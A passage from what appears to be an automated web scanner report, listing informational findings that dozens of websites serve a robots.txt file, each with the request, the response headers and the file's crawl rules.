Accept-Ranges: bytes
Content-Length: 231
Connection: close
Content-Type: text/plain

User-Agent: *

Disallow: /_old/
Disallow: /inc/
Disallow: /includes/
Disallow: /privacy/
Disallow: /terms/
Disallow: /unsub/

Noindex: /_old/
Noindex: /inc/
Noindex: /includes/
Noindex: /privacy/
Noin
...[SNIP]...

27.1693. http://www.usedrvsforsale.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usedrvsforsale.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usedrvsforsale.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 25 Apr 2011 00:41:39 GMT
Accept-Ranges: bytes
ETag: "781388ae12cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:16:06 GMT
Connection: close
Content-Length: 27

User-agent: *
Allow: /


27.1694. http://www.userfriendly.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.userfriendly.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.userfriendly.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:25:35 GMT
Server: Apache/1.3.39 (Unix) mod_gzip/1.3.26.1a mod_perl/1.30 mod_ssl/2.8.30 OpenSSL/0.9.7e-p1
Last-Modified: Sat, 12 May 2007 16:50:45 GMT
ETag: "cb8067-1ed-4645f065"
Accept-Ranges: bytes
Content-Length: 493
Connection: close
Content-Type: text/plain

# Google ad pages robots are special
User-agent: Mediapartners-Google*
Disallow: /cgi-bin/
Disallow: /discus/
Disallow: /email-addresses/
Disallow: /cartoons/read.cgi
# Google robots get in free
Use
...[SNIP]...

27.1695. http://www.usfamily--assistance.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usfamily--assistance.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usfamily--assistance.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:54:57 GMT
Server: Apache/1.3.41 (Unix) PHP/5.3.5 mod_ssl/2.8.31 OpenSSL/0.9.8q
Last-Modified: Fri, 14 Jan 2011 20:07:31 GMT
ETag: "2591f25-e7-4d30ad03"
Accept-Ranges: bytes
Content-Length: 231
Connection: close
Content-Type: text/plain

User-Agent: *

Disallow: /_old/
Disallow: /inc/
Disallow: /includes/
Disallow: /privacy/
Disallow: /terms/
Disallow: /unsub/

Noindex: /_old/
Noindex: /inc/
Noindex: /includes/
Noindex: /privacy/
Noin
...[SNIP]...

27.1696. http://www.usfca.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usfca.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usfca.edu

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 171
Content-Type: text/plain
Last-Modified: Tue, 21 Sep 2010 16:16:30 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-UA-Compatible: IE=EmulateIE7
Date: Wed, 04 May 2011 03:09:53 GMT
Connection: close

User-agent: *
Disallow: /uploadedFiles/Destinations/School_of_Business_and_Professional_Studies/documents/
Disallow: /giving/reportrequest/
Disallow: /facultydata.aspx*

27.1697. http://www.usherworld.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usherworld.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usherworld.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:17:19 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/4.4.9
Vary: Cookie,Accept-Encoding
X-Pingback: http://usherworld.com/beta_blog/xmlrpc.php
Set-Cookie: PHPSESSID=33e591e49981e2f6b490c6043b1b11db; path=/
Connection: close
Content-Type: text/html; charset="UTF-8"

User-agent: *
Disallow:

27.1698. http://www.usmoneytalk.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usmoneytalk.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usmoneytalk.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:48:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
X-Pingback: http://www.usmoneytalk.com/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.usmoneytalk.com/sitemap.xml.gz

27.1699. http://www.uvaldeleadernews.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.uvaldeleadernews.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.uvaldeleadernews.com

Response

HTTP/1.1 200 OK
Server: WWW
Cache-Control: public, max-age=900
X-TNCMS-Memory-Usage: 2081280
Content-Type: text/plain; charset=UTF-8
X-TNCMS-Venue: app
Date: Wed, 04 May 2011 01:24:18 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.0744
X-PHP-Engine: enabled
Real-Hostname: uvaldeleadernews.com
X-TNCMS-Served-By: cmsapp12
Content-Length: 84
Connection: close
X-Cache-Info: cached

User-agent: *
Disallow: /

Sitemap: http://www.uvaldeleadernews.com/sitemap.xml

27.1700. http://www.v103.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.v103.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.v103.com

Response

HTTP/1.0 200 OK
Last-Modified: Fri, 29 Apr 2011 02:16:00 GMT
Content-Type: text/plain
Content-Length: 275
X-Varnish: 4236527200
X-Cache-Server: varnish03
Expires: Wed, 04 May 2011 01:17:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 01:17:22 GMT
Connection: close

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /cc-common/
Disallow: /jacor-common/
Disallow: /iplaylist/
Disallow: /admin/
Disallow: /timages/
Disallow: /_template/
Di
...[SNIP]...

27.1701. http://www.vagazette.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vagazette.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vagazette.com

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Content-Type: text/plain
Date: Wed, 04 May 2011 03:11:27 GMT
X-TN-ServedBy: newsys.web.80
Keep-Alive: timeout=300, max=5000
Accept-Ranges: bytes
Connection: close
Last-Modified: Tue, 20 Apr 2010 13:19:22 GMT
X-Cache-Info: caching
Real-Hostname: vagazette.com
Content-Length: 1150

User-agent: Mediapartners-Google*
Disallow: /cgi-bin/
Disallow: /shared-content/
Disallow: /articles/*/*/*/ara/*/*.txt
Disallow: /*.prt$
Disallow: /*.eml$
Crawl-delay: 10

User-agent: Googlebot
Disall
...[SNIP]...

27.1702. http://www.valpo.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.valpo.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.valpo.edu

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:17:21 GMT
Server: Apache/1.3.33 (Unix) PHP/5.2.3 mod_ssl/2.8.22 OpenSSL/0.9.7d
Last-Modified: Sat, 13 Feb 2010 00:46:02 GMT
ETag: "13e5e21-16-4b75f64a"
Accept-Ranges: bytes
Content-Length: 22
Connection: close
Content-Type: text/plain

User-Agent:
Disallow:

27.1703. http://www.valueplace.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.valueplace.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.valueplace.com

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 663
Content-Type: text/plain
Last-Modified: Mon, 20 Dec 2010 15:29:36 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:24:36 GMT
Connection: close

User-Agent: *
Disallow: /App_Browsers
Disallow: /App_Data
Disallow: /AssetManagement
Disallow: /assets
Disallow: /bin
Disallow: /class diagram
Disallow: /classes
Disallow: /controls
Disallow:
...[SNIP]...

27.1704. http://www.vaniqa.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vaniqa.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vaniqa.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:09:55 GMT
Server: Apache
Last-Modified: Sat, 31 Jul 2010 00:38:05 GMT
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

#User-agent: *
#Disallow:

27.1705. http://www.vegasnews.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vegasnews.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vegasnews.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:48:11 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 09 Nov 2010 07:20:19 GMT
ETag: "4d02e8-20e-4949992b3b2c0"
Accept-Ranges: bytes
Content-Length: 526
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /wp-admin/
Disallow: /wp-includes/
Disallow: /wp-content/plugins/
Disallow: /wp-content/cache/
Disallow: /wp-content/themes/
Disallow: /trackback/
Disallow:
...[SNIP]...

27.1706. http://www.veggiegardeningtips.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veggiegardeningtips.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.veggiegardeningtips.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:10:07 GMT
Server: Apache
Last-Modified: Tue, 01 Jun 2010 15:33:31 GMT
Accept-Ranges: bytes
Content-Length: 244
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# Robots.txt file domain: http://www.veggiegardeningtips.com/

Sitemap: http://www.veggiegardeningtips.com/sitemap.xml

# All robots will spider the domain
User-agent: *
Disallow: /cgi-bin/
Disallow:
...[SNIP]...

27.1707. http://www.ventingdirect.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ventingdirect.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ventingdirect.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Date: Wed, 04 May 2011 01:15:00 GMT
Content-Length: 488
Connection: close

# Slow Down Crawls(wait 1 seconds between each request)
Crawl-delay: 0.5
User-agent: *
Disallow: *.cgi
# This will block the YA pages.
Disallow: /1/
Disallow: /accessDriver.cfm*
Disallow: /account/

...[SNIP]...

27.1708. http://www.verifiedworkathome.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verifiedworkathome.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.verifiedworkathome.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:20:52 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Fri, 04 Feb 2011 17:43:20 GMT
ETag: "0ac3393c4cb1:4"
Content-Length: 625

# Block a bot that was causing issues by ignoring Disallow lines below
User-Agent: OmniExplorer_Bot
Disallow: /

# Block hotlinking of music files by projectplaylist.com due to perceived user band
...[SNIP]...

27.1709. http://www.verragio.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verragio.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.verragio.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:19:41 GMT
Server: Apache/2.2.10 (Linux/SUSE)
Last-Modified: Tue, 21 Jul 2009 20:49:24 GMT
ETag: "192a0d-1bc-46f3d63bf1d00"
Accept-Ranges: bytes
Content-Length: 444
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /tmp/
Disallow: /siteadmin/
Disallow: /siteadmin/users.php
Disallow: /image_scroller.php
Disallow: /get_password.php
Disallow: /bin/
Disallow: /logs/
Disall
...[SNIP]...

27.1710. http://www.vetionx.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vetionx.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vetionx.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:56:20 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch13 mod_ssl/2.2.3 OpenSSL/0.9.8c
X-Powered-By: PHP/5.2.0-8+etch13
Set-Cookie: PHPSESSID=4a4635431130bf8afadc4c08aa4fdc65; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.vetionx.com/xmlrpc.php
Link: <>; rel=shortlink
Vary: Accept-Encoding
Content-Length: 72
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.vetionx.com/sitemap.xml.gz

27.1711. http://www.vforcecustoms.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vforcecustoms.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vforcecustoms.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/plain; charset=UTF-8
Date: Wed, 04 May 2011 01:09:39 GMT
Accept-Ranges: bytes
Connection: close
Set-Cookie: X-Mapping-chcfmbmj=5E13222BB78ACE8FA8D536638E608756; path=/
Last-Modified: Tue, 10 Aug 2010 15:48:35 GMT
Content-Length: 304

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

27.1712. http://www.viadeo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.viadeo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.viadeo.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:11:34 GMT
Server: Apache
Content-Type: text/plain;charset=UTF-8
Set-Cookie: Coyote-2-a030164=a040117:0; path=/
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close

# robots.txt

# Viadeo robots file for http://www.viadeo.com/

User-agent: *
Allow: /
Disallow: /abonnement/
Disallow: /annonces/detaildemonannonce/
Disallow: /annonces/detailduneannoncerecue
...[SNIP]...

27.1713. http://www.videoboxmen.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.videoboxmen.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.videoboxmen.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:36:30 GMT
Server: Apache
Vary: Host,Accept-Encoding,User-Agent
Last-Modified: Thu, 14 Feb 2008 04:31:05 GMT
ETag: "290"
Accept-Ranges: bytes
Content-Length: 656
X-Meta: S=app20
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Allow: /
Disallow: /beta/tos.seam
Disallow: /beta/privacy.seam
Disallow: /beta/2257.seam
Disallow: /tos.seam
Disallow: /2257.seam

User-agent: AdsBot-Google
Allow: /
Disallow: /beta/tos.
...[SNIP]...

27.1714. http://www.viewofhouse.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.viewofhouse.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.viewofhouse.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:06:34 GMT
Server: Apache/2.2.17
Last-Modified: Mon, 15 Nov 2010 15:11:20 GMT
ETag: "29b-49518da3c9600"
Accept-Ranges: bytes
Content-Length: 667
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: Googlebot
Disallow:

User-agent: Mediapartners-Google
Disallow:

User-agent: Adsbot-Google
Disallow:

User-agent: Googlebot-Image
Disallow:

User-agent: Googlebot-Mobile
Disallow:

Us
...[SNIP]...

27.1715. http://www.vigrx.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vigrx.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vigrx.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:45:25 GMT
Server: Apache
Last-Modified: Mon, 22 Mar 2010 21:46:04 GMT
ETag: "1ff22-17-4826a9fae7f00"
Accept-Ranges: bytes
Content-Length: 23
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

27.1716. http://www.vintage-toys.biz/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vintage-toys.biz
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vintage-toys.biz

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:14:25 GMT
Server: Apache
Last-Modified: Thu, 23 Apr 2009 05:09:16 GMT
ETag: "32df16e-88-46831e1b0f700"
Accept-Ranges: bytes
Content-Length: 136
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /cpx.php
Disallow: /medios1.php
Disallow: /toolbar.php
Disallow: /check_image.php
Disallow: /check_popunder.php

27.1717. http://www.virtualdj.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtualdj.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.virtualdj.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 29 Apr 2011 08:37:54 GMT
Vary: Accept-Encoding
Content-Type: text/plain
X-Cacheable: NO:Not Cacheable
Content-Length: 123
Date: Wed, 04 May 2011 03:36:10 GMT
Connection: close
X-Cache: MISS

User-agent: *
Disallow: /homepage/action/
Disallow: /wiki/action/
Disallow: /forums/action/
Disallow: /addons/action/

27.1718. http://www.virtuoz.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtuoz.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.virtuoz.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:22:29 GMT
Server: Apache
Last-Modified: Mon, 29 Nov 2010 15:21:54 GMT
ETag: "18e749-13f-49632a1cde880"
Accept-Ranges: bytes
Content-Length: 319
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Di
...[SNIP]...

27.1719. http://www.visionrevisited.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.visionrevisited.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.visionrevisited.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:02:20 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 31 Dec 2010 13:38:50 GMT
ETag: "207389e2-da-498b4ec218e80"
Accept-Ranges: bytes
Content-Length: 218
Connection: close
Content-Type: text/plain

# Robots.txt file created by http://www.webtoolcentral.com
# For domain: http://www.visionrevisited.com

# All robots will spider the domain
User-agent: *
Disallow:
Sitemap: http://www.visionrevisite
...[SNIP]...

27.1720. http://www.visitindy.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.visitindy.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.visitindy.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 01:12:14 GMT
Content-Type: text/plain
Content-Length: 57
Last-Modified: Wed, 04 May 2011 01:02:11 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /home
Disallow: /smiley
Allow: /

27.1721. http://www.visitwilliamsburg.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.visitwilliamsburg.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.visitwilliamsburg.com

Response

HTTP/1.1 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Wed, 28 Mar 2007 14:24:00 GMT
Accept-Ranges: bytes
ETag: "0c042ba4471c71:1e20"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:04:34 GMT
Connection: close

User-agent: *
Disallow: /

27.1722. http://www.visual-makeover.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.visual-makeover.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.visual-makeover.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:05:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
X-Pingback: http://www.visual-makeover.com/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.1723. http://www.vitaminlife.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vitaminlife.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vitaminlife.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:19:55 GMT
Server: Apache
Last-Modified: Mon, 16 Nov 2009 14:34:46 GMT
ETag: "b5000d-71-e93a4d80"
Accept-Ranges: bytes
Content-Length: 113
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /customer_account-exec/
Allow: /
Sitemap: http://www.vitaminlife.com/sitemap/sitemap.xml

27.1724. http://www.vocalo.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vocalo.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vocalo.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:52:40 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Tue, 01 Mar 2011 14:05:45 GMT
ETag: "38c17d-624-49d6c4adf0040"
Accept-Ranges: bytes
Content-Length: 1572
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.1725. http://www.voe.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.voe.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.voe.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:05:52 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 14 Jan 2010 03:50:30 GMT
ETag: "d68121-130-c9c9ad80"
Accept-Ranges: bytes
Content-Length: 304
Cache-Control: max-age=86400
Expires: Thu, 05 May 2011 03:05:52 GMT
Vary: Accept-Encoding
P3P: CP="PHY DEM ONL PUR NAV COM INT UNI STA OUR CUR ADM DEV CONi CAO COR IND DSP"
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

27.1726. http://www.vpntrack.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vpntrack.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vpntrack.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:06:26 GMT
Server: Apache/2.2.17 (Unix) mod_apreq2-20051231/2.6.0
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Last-Modified: Wed, 21 Oct 2009 07:26:31 GMT
ETag: "1b384e4-19-4766ce5cff7c0"
Accept-Ranges: bytes
Content-Length: 25
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

27.1727. http://www.vstore.ca/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vstore.ca
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vstore.ca

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:01:38 GMT
Server: Apache/2.0.52 (CentOS)
Last-Modified: Mon, 27 Nov 2006 20:38:24 GMT
ETag: "b8a4e48f-3ac-83dcb000"
Accept-Ranges: bytes
Content-Length: 940
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /secure/
Disallow: /secure-e-commerce-web-hosting/
Disallow: /login.php
Disallow: /e-commerce-web-hosting-login.php
Disallow: /admi
...[SNIP]...

27.1728. http://www.wackbag.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wackbag.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wackbag.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:16:09 GMT
Server: Apache/2.2.17 (Fedora)
Last-Modified: Wed, 03 Dec 2008 04:15:36 GMT
ETag: "66b344-54b-45d1cb223ca00"
Accept-Ranges: bytes
Content-Length: 1355
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Fasterfox
User-agent: Java/1.4.1_04
User-agent: MJ12bot
Disallow: /

User-agent: *
Crawl-delay: 5
Disallow: /attachment.php
Disallow: /avatar.php
Disallow: /editpost.php
Disallow: /member.
...[SNIP]...

27.1729. http://www.wacotribcars.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wacotribcars.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wacotribcars.com

Response

HTTP/1.1 200 OK
Set-Cookie: AlteonP=f49386bff49386b5; path=/
Date: Wed, 04 May 2011 01:13:54 GMT
Server: Apache/2.2.17 (Win32) PHP/5.2.14 JRun/4.0 mod_ssl/2.2.17 OpenSSL/0.9.8o
Set-Cookie: tracking=173.193.214.243.1304471634293172; path=/; expires=Mon, 31-Oct-11 01:13:54 GMT; domain=.carsite.com
Last-Modified: Wed, 23 Mar 2011 03:27:35 GMT
ETag: "63710000001e-102-49f1df11e37c0"
Accept-Ranges: bytes
Content-Length: 258
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /Admin/
Disallow: /Dynamic_JS/
Disallow: /JS/
Disallow: /NoApp/
Disallow: /NoTarget/
Disallow: /Properties/
Disallow: /ServerTest/
Disallow: /Taconite/
Disallow: /Temp
...[SNIP]...

27.1730. http://www.wajabu.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wajabu.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wajabu.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 16:32:57 GMT
Server: Apache/2.2.9 (Fedora)
Last-Modified: Thu, 15 Jan 2009 18:07:07 GMT
Accept-Ranges: bytes
Content-Length: 328
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /images/
Disallow: /admin/
Disallow: /includes/
Disallow: /phpFlickr/
Disallow: /js/
Disallow: /sessions/
Disallow: /Zend/
Disallow: /files/
Disallow: /FCKeditor/
Disallow: /cs
...[SNIP]...

27.1731. http://www.walazoo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.walazoo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

